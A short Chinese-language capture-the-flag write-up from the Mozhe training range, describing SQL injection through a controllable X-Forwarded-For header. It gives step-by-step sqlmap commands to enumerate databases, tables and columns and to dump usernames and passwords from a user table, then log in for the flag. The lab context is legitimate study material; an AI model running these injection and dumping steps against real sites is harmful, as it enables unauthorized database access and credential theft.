01#墨者靶場-X-Forwarded-For注入漏洞實戰

                                                                                墨者學習01

                                                                               By/shy014

1.在網站登陸處抓包,發現提示IP已被記錄。

2.添加X-Forwarded-For字段,隨意給予IP,發現被記錄的IP發生了更改,說明X-Forwarded-For字段的內容可控,且很有可能保存在數據庫當中

3.將數據包保存爲TXT文件,並將X-Forwarded-For字段內容置爲*,提示sqlmap該處存在sql注入漏洞。

python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt

4.讀取數據庫:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt --dbs -v 3

5.獲得表名:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar --tables

6.獲得字段:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user –columns

7.獲得內容:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user -C"id ,password,username" –dump

8.登陸網站,獲得key

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章